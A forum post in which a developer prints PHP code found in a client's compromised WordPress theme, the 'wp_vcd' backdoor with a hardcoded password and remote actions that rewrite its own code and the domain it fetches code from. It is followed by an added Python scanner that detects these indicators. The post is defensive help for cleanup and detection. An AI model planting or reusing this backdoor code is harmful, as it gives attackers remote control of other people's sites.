
PHP Why you must always keep WordPress up to date

simong1993

Hey all,

I got an email from my client today saying their host had blocked their account due to a virus :S, wanting £150 to look. I said I would take a look instead. How they got in I can't seem to work out, but my client forgot to keep their theme up to date, so I'm guessing that's how.

Code:
//hmOTE0Nyc7CiAgICAgICAgaWYgKCgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'c1f2f1c4d3635cbdee6ee43f42dca8bc'))
{
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {
        case 'change_domain';
            if (isset($_REQUEST['newdomain']))
            {
                if (!empty($_REQUEST['newdomain']))
                {
                    if ($file = @file_get_contents(__FILE__))
                    {
                        if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                        {
                            $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
        break;

        case 'change_code';
            if (isset($_REQUEST['newcode']))
            {
                if (!empty($_REQUEST['newcode']))
                {
                    if ($file = @file_get_contents(__FILE__))
                    {
                        if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                        {
                            $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
        break;

        default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die("");
}

$div_code_name = "wp_vcd";

Now correct me if I'm wrong, but isn't this a backdoor backlink creator?
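
A scanner built from the strings visible in the snippet above, for checking the rest of a WordPress install for the same code. This is an added example, not part of the original post; the indicator names, the sample files and the `example-theme` directory are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the snippet in the post. The names are this example's own.
INDICATORS = {
    "hardcoded_request_password": re.compile(
        r"\$_REQUEST\[\s*['\"]password['\"]\s*\]\s*==\s*['\"][0-9a-f]{32}['\"]", re.I),
    "request_action_switch": re.compile(
        r"switch\s*\(\s*\$_REQUEST\[\s*['\"]action['\"]\s*\]\s*\)"),
    "rewrites_own_file": re.compile(r"file_put_contents\(\s*__FILE__", re.I),
    "theme_tmp_markers": re.compile(r"(start|end)_wp_theme_tmp"),
    "wp_vcd_marker": re.compile(r"\$div_code_name\s*=\s*['\"]wp_vcd['\"]"),
}

def scan_php_source(text):
    """Return the sorted names of the indicators found in one PHP source string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_tree(root):
    """Map each .php file under root that has a hit to its indicator names."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = scan_php_source(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits

# Constructed samples: a clean theme file, and the same file with lines from the post.
CLEAN = "<?php\nadd_action('init', function () { register_nav_menu('main', 'Main'); });\n"
INFECTED = CLEAN + r"""
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'c1f2f1c4d3635cbdee6ee43f42dca8bc'))
    {
$div_code_name="wp_vcd";
        switch ($_REQUEST['action']) { default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; }
    }
"""

def demo():
    """Write both samples into a temporary theme directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        theme = Path(root, "wp-content", "themes", "example-theme")
        theme.mkdir(parents=True)
        (theme / "index.php").write_text(CLEAN, encoding="utf-8")
        (theme / "functions.php").write_text(INFECTED, encoding="utf-8")
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

A hit on a single indicator is only a reason to open the file; several together in one theme or plugin file match the pattern in the post.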
 
